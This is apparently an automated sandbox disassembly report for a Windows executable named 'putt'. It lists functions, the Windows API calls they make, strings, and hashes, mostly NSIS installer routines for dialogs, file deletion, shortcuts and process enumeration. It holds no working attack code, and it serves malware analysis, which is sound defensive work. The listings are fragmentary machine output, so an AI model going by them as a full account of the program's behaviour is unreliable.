                                                                                                                                                                                                                                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 877 402175-40218b call 401446 * 2 882 402198-40219d 877->882 883 40218d-402197 call 4062cf 877->883 884 4021aa-4021b0 EnableWindow 882->884 885 40219f-4021a5 ShowWindow 882->885 883->882 887 4030e3-4030f2 884->887 885->887
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: HideWindow
                                                                                                                                                                                                                                                                              • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                              • String ID: $ @$M$N
                                                                                                                                                                                                                                                                              • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                              • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                              • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                              • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                              • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                              • String ID: F$A
                                                                                                                                                                                                                                                                              • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                              • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040427D
